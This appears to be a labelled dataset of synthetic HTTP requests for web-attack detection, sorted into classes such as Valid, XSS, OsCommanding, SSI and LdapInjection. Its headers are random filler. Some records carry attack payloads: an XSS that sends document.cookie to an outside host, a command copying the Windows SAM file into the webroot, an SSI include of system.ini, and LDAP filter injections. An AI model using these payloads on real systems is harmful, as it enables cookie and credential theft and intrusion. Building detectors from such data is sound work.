Accept-Language: av-7ma4r;q=0.5, noa-Eh;q=0.1, heEeves-yoeeq0;q=0.3, qzo1dNx-xn8T
Cache-Control: no-cache
Client-ip: 172.17.143.228
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="993"
Date: Mon, 23 Jul 07 04:31:45 UTC
ETag: "fQ-1cn8ZVzi.yxkm"
Expect: iIe36c
From: tdove@2rii.it
If-Modified-Since: Tue, 07 Nov 06 11:43:58 CET
If-Unmodified-Since: Sat, 27 Dec 08 13:40:01 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Mar 09 01:31:43 CET
Max-Forwards: 3
MIME-Version: 0.3
Pragma: hvepn=e
Proxy-Authorization: dtotg hnese=thdmar
Authorization: Basic dWdoZTpydGhlZXRoYQ==
Range: 654450-98923,546372-748940,5-4413
Referer: http://olnnaENI.de/odmsua/nhonRre/metld0tm.msf
TE: trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: Mozilla/3.3 (X11; U; SunOS sun4u 0.8; ei-t7; rv:7.0.7) Gecko/74049383
UA-CPU: MIPS
UA-Disp: 3260,0446,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: 9.7 119.189.49.229, 6.0 www.y0ry.png
Transfer-Encoding: identity
Upgrade: cheaq/9.6, loIi/0.0
Warning: 112 61.14.186.201 "qggonearhnim7yltrsa" 
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n9=i56&srn=3129354&9iieglIlettgE=37860&n3sduxgtee6=56347&f0nidTjpEokc=7trsr&SYBRitmp5j=0t9manph-h<dnetcatshutdownsd|dnet&tEizNtaeosgnrlT=llv2Ico&aPodivXZ-=32321&Bnntfueu3it=9812085

End - Id: 33859
Start - Id: 34563
class: Valid
POST /ybwbFdxDp1.Wb0QHPB/kfNx/Jeha8cfnna2fa.dll? HTTP/1.0
Content-Length: 36
Content-Language: h,ricoiamh,0mm
Content-Encoding: deflate
Content-Location: /ee81s/soOlhni/uhKit3ed/Spit5/ea3wefm.jsp
Content-MD5: YW1pY3JjcmdleWZkZXNSZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jan 06 02:08:48 UTC
Last-Modified: Fri, 28 Jul 06 06:01:00 GMT
Host: www.rCeed.be
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-3, cp-932;q=0.9, windows-874;q=0.1, x-mac-korean;q=0.3, iso-8859-8;q=0.6
Accept-Encoding: deflate, compress, compress;q=0.3, identity, compress;q=0.6
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 172.87.226.168
Cookie: c9s3c=i/:gLnmki;aiaee6ntnncn=41
Cookie2: $Version="5"
Date: Wed, 21 Feb 07 21:12:49 CET
ETag: "Tz5zi6SS0H-yjd@okIKF"
Expect: asyn
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 28 Sep 09 09:48:25 GMT
If-Unmodified-Since: Fri, 13 Aug 04 17:06:56 UTC
If-Match: *
If-None-Match: "KdX_vLFPQri_dh@KIRAd"
If-Range: "mw@dOmfA9lOTQtCSuW"
Max-Forwards: 4
MIME-Version: 5.6
Pragma: l=NoeTra
Proxy-Authorization: NTLM dmxhYXN0Tm1md25ubnFpc2VLdHJJZWVrYnZ1SXJvaHluc25hNHR1c1ZtQ3lvZHI=
Authorization: NTLM ZXBlZm5FRTVhYnlockVndG9PaE9laHNpZXN5NHVvTjF4MmdkeXJBbmFvd25v
Range: -4597,119988-57606
Referer: /toTe6esi.jpg
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 6.7; Lr-no; rv:1.8.3) Gecko/09052129
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 811x2979
Via: 2.1 www.ofsgivs.jpg
Transfer-Encoding: gzip
Upgrade: aaee/2.3, sryou/1.6, tsu7z/2.8
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 26405487538799285497
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oPo7kZa9sb=Deetr d&e6daeafIszi8ao=m 

End - Id: 34563
Start - Id: 4809
class: Valid
PUT /yl14Khn9UnTnCnt3enna/ctm3A/x3b/kiklib7Xl4T/b7.mN2ftp.jsp? HTTP/1.1
Content-Length: 288
Content-Language: 4ne,se4
Content-Encoding: deflate
Content-Location: http://6epd3f.net/qsmm/Wt2e/oOardn.mpg
Content-MD5: cmlzdG9lVHV4MnRuZW9lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Oct 08 22:33:03 CET
Last-Modified: Sun, 24 Sep 06 10:07:52 UTC
Host: www.tGis.com
Connection: close
Accept: image/*, video/quicktime;q=0.1, application/zip;q=0.9
Accept-Charset: iso-2022-kr, cp-936;q=0.4, x-mac-ce;q=0.1, windows-1255;q=0.6, x-mac-icelandic
Accept-Encoding: deflate, identity
Accept-Language: f0OL-sQc9e, ts-r9e
Cache-Control: max-stale=1
Client-ip: 202.184.48.105
Cookie: Fao=OSeumgniso3ac;VIRNocperlwq9rL=x@F7;me=ihctenw8e;u5ges=yeN/icp
Cookie2: $Version="83"
Date: Sun, 30 Mar 08 03:53:53 CET
ETag: W/"6A_kcQPwQQjshfM2"
Expect: 100-continue
From: otAkg@xeDgx.gov
If-Modified-Since: Wed, 30 Dec 09 10:21:03 UTC
If-Unmodified-Since: Sat, 07 Oct 06 07:35:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Feb 08 18:45:21 GMT
Max-Forwards: 6966
MIME-Version: 0.2
Pragma: nhrsg2=R3eeta
Proxy-Authorization: rat4p uoeGihTn=aNnuf
Authorization: Basic bGE5cjpyZ08wYjc=
Range: -302,2-7699
Referer: http://eToa.gov/8filgao.cfm
TE: chunked,chunked,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 5.9; ut-ul; rv:2.4.5) Gecko/98580790
UA-CPU: Sparc
UA-Disp: 347,7890,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 904x222
Via: HTTP/9.8 87.245.14.153
Transfer-Encoding: identity
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 798 www.TTeci.shtml "rhttxet1t4wluusa" 
X-Forwarded-For: 62.213.17.234
X-Serial-Number: 62979585103179950759
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

aashtemhan1qeih=5192094&ssOto=unetcatnT@httpnhQ&Ag2ietf=rbnao&dagftfc=6lM&4rsAegeOedn7E=204315588&aeae=40564&.150Ltelnet=mL1fN&daOr3iah=n\hmm?am ? &5t4oyd=35030692&BfszRE=iAumiGv2y&it=xmlm(isrted?ehu0hpassthruopt&2ho=5335&thikqoEsxmcmi=siaoLlilomalst/81z&lobtad=iUat0lhaeu2Y

End - Id: 4809
Start - Id: 3116
class: Valid
GET /nHw8p_-/yettrti5/goeorTml/idshsUieasacrdai/tN17yDVdPiD5R/f1ad72body2W0Pp.htm?snp72hexfgs=x+et%3Ea%3FE-&emledrpRGiUhh8=%5Ce&ltberse2reyFirt=3&5o=h%40hDWrt_U HTTP/1.0
Host: www.51Ehdpisua.org:42651
Connection: keep-alive
Accept: text/xml, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 42.139.91.8
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="53"
Date: Tue, 16 Aug 05 08:28:42 CET
ETag: "4Ll0_82lrVtR2rBjtA"
Expect: uC40=ureig
From: eead@01e8oq1.gov
If-Modified-Since: Wed, 25 May 05 11:16:01 GMT
If-Unmodified-Since: Sat, 24 Feb 07 21:46:17 CET
If-Match: "glP6@51npR_Y9kSy2LNR"
If-None-Match: *
If-Range: Sat, 13 Mar 10 16:47:21 GMT
Max-Forwards: 841
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic ZW1kODphaE5UZWFyeQ==
Range: -6106,0309-,1-
Referer: /sgaodcew/sgn1/da2urj1/lhhh17v2/aleeNnam.cgi
TE: gzip;q=0.4
Trailer: Accept-Language
User-Agent: hrqfaAr16k (hY-_suxQWT)
UA-CPU: PowerPC
UA-Disp: 9523,9221,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5219x775
Via: HTTP/5.6 www.hrnRh.html, FTP/6.9 www.ephUitmR.js, 4.9 www.trp6oseo.shtml
Transfer-Encoding: deflate
Upgrade: n4c/0.0, pOx/3.9
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 249.105.138.11
X-Serial-Number: 1722875
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3116
Start - Id: 47765
class: XSS
GET /scriptd4K3RY30T/dau0vq/FSQTTNViV58.iframe.php?hlernt=%26r&ctsskeeiheiE=dd&iBbkMiz85n=%3Cimg+++src+%3D+++%22javascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.alsintor.com%2Fcgi-bin%2Falnt.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&cnhgdwannre=itte9hosirlgh2R1&fournenoeet=149&lisgp=Rrglerogo+s%3Ane&lPoseeiz=4896272 HTTP/1.0
Host: 201.172.156.216:63
Connection: 1aggxife
Accept: */*
Accept-Charset: big5, windows-1252;q=0.7, big5, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: krrogly-eue, eednar-ia, Jm-civn, nrtina-dp;q=0.9
Cache-Control: max-age=75125
Client-ip: 226.81.74.174
Cookie: fitytSArve=tgiaat;nwaPianh=o;ntuoEbt=ruUrsu62sboteK;9Sh0J.copyxy=89091;t5CarrFah=tgo
Cookie2: $Version="983"
Date: Sun, 08 Mar 09 06:58:01 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: 100-continue
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: *
If-None-Match: "ynX1yZA.drdQCZ_JUD"
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 8723
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic cm1hcndybjphQmVsbmVv
Range: 0-6,74113-
Referer: http://www.tsotkmt.com/orHrO/olnD/nc8ls3e.wav
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 4.1; ei-ea; rv:5.8.5) Gecko/48624623
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: HTTP/1.4 229.94.67.144, 9.8 www.shssi.htm
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47765
Start - Id: 42879
class: OsCommanding
GET /nndatatquR/uNJrmzzbeDRO@XKK-/ohJOT6nMwqv8/whEiNvAHaa/tnateg4apqe7o/a3XkDq_a.jpg?Dsoehhe0neos=22.49.228.97++++%7Ccopy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&.idD=5542 HTTP/1.0
Host: www.tly3t.org
Connection: keep-alive
Accept: image/gif
Accept-Charset: macintosh, windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: tt-eaeasdt, tScn0hi-enp;q=0.9, o75a-louR, ms-aiahIena;q=0.7
Cache-Control: only-if-cached
Cookie: se=ngst;xeh=rmlet;rqEewwsTxtcid=EpohPieqsjnbeFa6
Cookie2: $Version="443"
Date: Wed, 08 Apr 09 23:58:22 GMT
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Wed, 23 Feb 05 07:10:11 UTC
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "AetJ3vyGNa.Y_EyF7"
If-None-Match: *
If-Range: *
Max-Forwards: 322
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Basic bGVhZTpzc0hTc3Vv
Referer: http://www.4utn3na.biz/hhei/vbmgi/Rntns/erpms2eo.tiff
TE: trailers,deflate;q=0.0
Trailer: Max-Forwards
User-Agent: udwZt/3.7.7.7.4
Via: HTTP/2.9 www.nadel.tiff, 6.9 155.196.119.58:4, 6.0 48.133.224.102
Transfer-Encoding: compress
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42879
Start - Id: 34888
class: Valid
PUT /ndj_yzuDgYnkd8txuVhN/lhhttpshtacceskJyht/irbjaapTeeeg.js? HTTP/1.0
Content-Length: 33
Content-Language: l4fniTu,TasEa,1haagb
Content-Encoding: identity
Content-Location: http://www.neIndttv.gov/t6seeha/A8meisp/dRYia/6LiEnnto/4CrbHhw.css
Content-MD5: c2hzaGtpclJsYWVvYThuSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 22:45:12 CET
Last-Modified: Wed, 07 Nov 07 13:37:58 CET
Host: www.dhnwegeotl.com
Connection: keep-alive
Accept: image/jpeg;q=0.3
Accept-Charset: windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=04702
Client-ip: 148.13.5.11
Cookie: betweenwherereplaceV=8xml-@t0dr<hshnq ry;odGnA=1631
Cookie2: $Version="8"
Date: Wed, 26 Sep 07 14:38:51 CET
ETag: "v_aeITxqGo4O3-8k2YwZ"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Tue, 30 Jan 07 11:54:50 GMT
If-Unmodified-Since: Wed, 14 Mar 07 19:44:38 UTC
If-Match: *
If-None-Match: "Zj@Hh34l@Us3uhyvGUrU"
If-Range: "e2vk9np6.6EwFJ3i"
Max-Forwards: 4
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: NTLM NjVzZUxlbllCYVhlcklvQjNlc2V1eWlldGRvbWhlTmF1OW9vMmVlaXNsTGVzcA==
Range: 092889-
Referer: http://www.la3sr.de/eoe6toso/dIhlo2i/de3ot/noNnz.jsp
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: aE7UXt0s http://www.icd67tia.de
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0430x9866
Via: FTP/2.3 www.abdehwaq.html, iibmk/3.0 www.yiss.js, 2.8 171.254.240.47
Transfer-Encoding: identity
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 984 www.5sli.jpeg "inisbLIlrtinx" 
X-Forwarded-For: 186.251.191.52
X-Serial-Number: 8380716
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ek=ae5 cc'whliI9o&TdivWZI=cAu6Q

End - Id: 34888
Start - Id: 40524
class: SSI
GET /eAI/MM/arit/uvaeqhbptdoSTtaa/4tetnfdtonafn.php3?Oie7ecemi=stmpnm%2Fobjectroednwinnt&984F=an%40P7dod&Aedh=%24cgtpa%5Bae5&rctikhNn0pTn=2333335&onmpiWol=i6t&iNcpetnkes7=03&u8nph-fw=wp-&an1l=eRln9&Ateroht=%3C%21--+++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&lea=rLznAMgrDG HTTP/1.1
Host: www.a6UOs5oaml.be
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, x-mac-turkish;q=0.8, iso-8859-15;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 166.14.189.36
Cookie: eoM=jnnc9yteHshm=na;D.@P=432;VC8h=pe8gw
Cookie2: $Version="2"
Date: Sat, 01 May 04 21:20:20 GMT
ETag: "G5thXp8xs5cDE.veI"
Expect: aqpn=wyer0sy3
From: OeTsa@undhtsdpd.it
If-Modified-Since: Tue, 25 Sep 07 08:23:03 UTC
If-Unmodified-Since: Thu, 24 May 07 09:01:53 GMT
If-Match: "@ONyKZ6B4YJ@dn3o1"
If-None-Match: *
If-Range: Sun, 03 Apr 05 24:28:07 UTC
Max-Forwards: 0
MIME-Version: 4.5
Pragma: eawgecu=ect
Proxy-Authorization: dler dcyii=syes
Authorization: Basic amM0eDp0dklxb2F0ZQ==
Range: -112429,931-60
Referer: /dRout2/xini/33aoo/senmrt/nti0o.gz
TE: deflate;q=0.1,deflate
Trailer: If-Modified-Since
User-Agent: ev3CfD http://www.darano.fr
UA-CPU: Sparc
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.3 www.ns25.css:3, 5.5 168.218.109.248
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 61054598804485092045
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40524
Start - Id: 24161
class: Valid
GET /awv@BxFIQg5h/AT1SoxLHmjkj-varh/uewa3kosz/nCdXCk4Fi/eCLy1@H7D@aQhLR6/lsdwogcmtgtqEuh.tiff?naa8nrai=Otadanat&h.ffUwgetFT-H_l=nehchsHqro6helRra&zsbtmee=3013&erumcpgcn=95270&owcSds=i%3CsinxA&ireohh9=r44%40q5giYar&ioklhy6T7r71ajh=nyEIneaiigeiA&nItetc60b=39927102&arn7e=mDdi+%3B&zio=o7otonodeqltnnh&bdAtlh=lUuizadq&udeh=+incltje64&xIu3nmmsleuEI=cf%29pscriptsptT&3tsanp2=eyintctys42alo HTTP/1.1
Host: www.waetud.ch
Connection: keep-alive
Accept: text/xml;q=0.5, audio/*;q=0.8
Accept-Charset: iso-2022-kr, windows-874
Accept-Encoding: *
Accept-Language: sss-asdsr5o, 9evpp-AaesxreE;q=0.0, halpe5R-fklod, tqywinI-0n
Cache-Control: max-age=67336
Client-ip: 123.204.230.26
Cookie: TA9t4seSilNer=1260;IB@@iframe8JqjTV=250086;idunionJhWF8=2
Cookie2: $Version="45"
Date: Wed, 09 Sep 09 11:28:36 CET
ETag: "s4tBYBnxgRfhumtRaIa"
Expect: 100-continue
From: ued5aade@ntinux.ch
If-Modified-Since: Mon, 19 Jan 04 16:59:00 CET
If-Unmodified-Since: Thu, 16 Feb 06 16:00:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8232
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="Onwtt"
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: /rystNsn/tokciriz/acedr2h/leeaH6o/Ien9.sh
TE: deflate
Trailer: Accept-Language
User-Agent: esIetrsff6/4.1.5.0
UA-CPU: StrongARM
UA-Disp: 2537,365,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 978x997
Via: drrl/3.7 www.m4eu.js, 8.9 www.thsa.css, 0.1 244.39.117.117
Transfer-Encoding: compress
Upgrade: bleion/1.0, dtdtte/9.5
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 7632942220156
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24161
Start - Id: 10068
class: Valid
GET /bearfB1londsaatLetS.dll? HTTP/1.1
Host: 174.177.18.168
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dkMqEg-tmnazcR;q=0.3, sEDt-rho;q=0.7, sDa35goT-9oNxrtq, ciwe-figtuiqt;q=0.3, ayeiw7-SEnda;q=0.4
Cache-Control: no-transform
Client-ip: 118.12.13.237
Cookie: Chissh=a\iS
Cookie2: $Version="93"
Date: Mon, 25 Feb 08 17:45:21 GMT
ETag: W/"ZBifUbV4bCvajQll6kU"
Expect: lxltoMtt=olvdcho;8ecooa=lrlnd
From: aemYeste@u736nnw.biz
If-Modified-Since: Sun, 18 Oct 09 12:48:30 GMT
If-Unmodified-Since: Mon, 09 Feb 04 07:49:28 CET
If-Match: *
If-None-Match: "DSCC59jVe2Um5sKzr"
If-Range: Mon, 21 Sep 09 15:49:18 CET
Max-Forwards: 4027
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: flkeb doigltee=bandt
Authorization: Basic YTJ0NGVseDp1aWVzZnk2
Range: 0143-8
Referer: /dtowh4m/tldezh.html
TE: gzip;q=0.8,trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.0 (Windows; U; Win98 4.5; ri-te; rv:2.4.5) Gecko/61828460
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6453x8240
Via: osgsr/4.0 www.gatlrwn.tiff, 0.9 www.Tttb0q.jpeg:2824
Transfer-Encoding: identity
Upgrade: dioExt/5.6, 5ost/5.4
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 9719110193
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10068
Start - Id: 1469
class: Valid
GET /rbu79rime/kSperlASJ/tdlnoct8rxmta.php?Y.hTCtj=stiulsytd HTTP/1.1
Host: www.rcjedss4.com
Connection: close
Accept: image/png;q=0.7
Accept-Charset: gb2312;q=0.5, utf-7, iso-8859-2;q=0.8, cp-936
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 109.166.117.239
Cookie: emrsAebn1nsfiwT=3;oLFdua5h=rmfbf2uaoeBb;7acauhn=ysn ;drnOa=15;5@IAE=oBvk9jB;mIlosielSvi=Aefs5i7easl
Cookie2: $Version="17"
Date: Wed, 07 Jun 06 23:57:11 GMT
ETag: W/"_CtgFJtMezjZdJby2d"
Expect: 100-continue
From: s8wenUT@gvestweiep.st
If-Modified-Since: Sun, 29 Jan 06 06:42:33 GMT
If-Unmodified-Since: Mon, 05 Jan 04 09:13:26 UTC
If-Match: "8f3A5os_QIWHW_W"
If-None-Match: "CsSD7Xe2Fgh_q50wz"
If-Range: Thu, 21 Jun 07 08:40:33 GMT
Max-Forwards: 049
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: Digest qop=auth
Range: -64,0-
Referer: /hitss5e3/gawdilm/stepp/eeet.jsp
TE: chunked;q=0.2
Trailer: If-Match
User-Agent: ceneufh (ms4ds3nVhy; y6zUOjUUr; yye6W2y)
UA-CPU: 68000
UA-Disp: 1923,599,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0275x4653
Via: 2.0 www.shRxt.jpg, 1.9 11.105.78.66
Transfer-Encoding: identity
Upgrade: kr1Di0/3.6, i6oen/5.3
Warning: 048 www.resetlo.js "j7eznorhohrr83qef4f" 
X-Forwarded-For: 6.0.93.109
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1469
Start - Id: 37769
class: LdapInjection
GET /aChhto4svtito/weko/necsni2ghiEdaeeuqpc/hanYhuow.tiff?sicshanireia=%29+%28+%7C+%28AetE%3Diroe*%29&raa=iYNQqzNM HTTP/1.0
Host: www.4eci.com
Connection: ogietian
Accept: video/quicktime;q=0.0, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 55.201.60.227
Cookie: ncarweeess=65
Cookie2: $Version="070"
Date: Wed, 07 Jan 04 03:47:00 CET
ETag: W/"RYy4X6t.spo28jV5m8f"
Expect: 100-continue
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Sun, 19 Jul 09 08:33:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 17:13:24 CET
Max-Forwards: 638
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: /9clH/elcef/zs2x1a/tslde.gif
TE: deflate,trailers
Trailer: TE
User-Agent: ebH9ytlNlah
UA-CPU: x86
UA-Disp: 3072,0786,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: enMe/9.4 www.7o1SiHvd.js
Transfer-Encoding: compress
Upgrade: Ebsle/5.6, dvNtn/8.8, on3/2.1, sae/8.5
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37769
Start - Id: 38518
class: LdapInjection
GET /mtnet/LlqaX/ahaandmol4/.gukRo/Qy5h6Qh8XLN/ybntioetheeEeotj/hilhhe4tnedml2to6.nsf?wdjtWeioEnvnl=ioe++nboot.iniar7pfTZsgn&TDqIRJFcGz=snee%29%28%26%28objectClass+%3D++++s7iH*%29 HTTP/1.0
Host: 71.122.74.127
Connection: close
Accept: image/jpeg;q=0.7
Accept-Charset: x-mac-japanese;q=0.5, x-mac-chinesetrad;q=0.0, x-mac-icelandic, iso-8859-8;q=0.1, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: x-ANNyed, iogh5-ra0iunj;q=0.9, t5Vele-eeexo, EsRa-lniTtaT;q=0.0
Cache-Control: max-age=31
Client-ip: 123.9.93.50
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="807"
Date: Fri, 15 Dec 06 17:45:18 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 10 May 08 07:03:09 UTC
If-Unmodified-Since: Wed, 18 Jan 06 16:43:29 GMT
If-Match: "Cy@Hwx1.vDqaUy52to9"
If-None-Match: "G7ke9wOVRjSjQtb"
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 6
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: tAEi rgTfi=rqw6ehy
Range: -087,245-62681,-648438
Referer: /oqoeHhmh/rtan/aaoDicY/oDts0ie/ttola.msf
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 4.0; at-xe; rv:8.1.9) Gecko/60547275
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 2.9 230.8.31.70:54, 9.4 www.ifrtT.tiff:823
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 193 117.108.90.63 "cecihsnisuuazodrattt" 
X-Forwarded-For: 138.56.211.47
X-Serial-Number: 30599
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38518
Start - Id: 26929
class: Valid
GET /mE4hp/lKamWKpUZRkn/i6HU_sR-0oF7JfAEA7k/aV56ST@k/g3bw-cwXuXYc0.O.P/reddoorljttihIisWlaa/rcFpVGMK/7ne9jhys/ana/cnafstrFeeCl/gc6LGa3.ZQ7Jq.php?b6GbtuYr99e=ilnRu&vmddntlgNDoachd=489792&oocoacaudqenrm=E%2F&dtsAyn=4641&i6d0lFmailZ=sTl0tlOrsoafr&tws=00277&15id_LB=50-&KxYQq5tmp=iseoaM&7Z%uTfknVnetcatA=aeoistfotci%3A&9gMv0=f&ia=sE7CC&Y579Vf@N=30654&ydxtu=edEqrKVy&K5_9blXY_uhj=6762 HTTP/1.1
Host: 10.215.206.149
Connection: close
Accept: audio/*, audio/x-wav, application/x-tar
Accept-Charset: macintosh, windows-1251, iso-8859-1
Accept-Encoding: compress;q=0.6, gzip;q=0.4, compress
Accept-Language: ljll-gii;q=0.2, tpthfgt-e, ahsrc-ngefmuy, d63e-o
Cache-Control: only-if-cached
Client-ip: 177.49.29.12
Cookie: sjAhhna5=01;w8eacy87ii=914930453;xDIYvat=ophp0$iamse ;oO4group byrw=54405;rheavrt=n/a;ged=a0oidtmxoH0
Cookie2: $Version="42"
Date: Sun, 07 Feb 10 13:02:21 CET
ETag: "5kwEdB.HY4O_Yobzb"
Expect: 100-continue
From: hivetoa@epAldB8o.biz
If-Modified-Since: Sun, 17 Jan 10 10:19:19 GMT
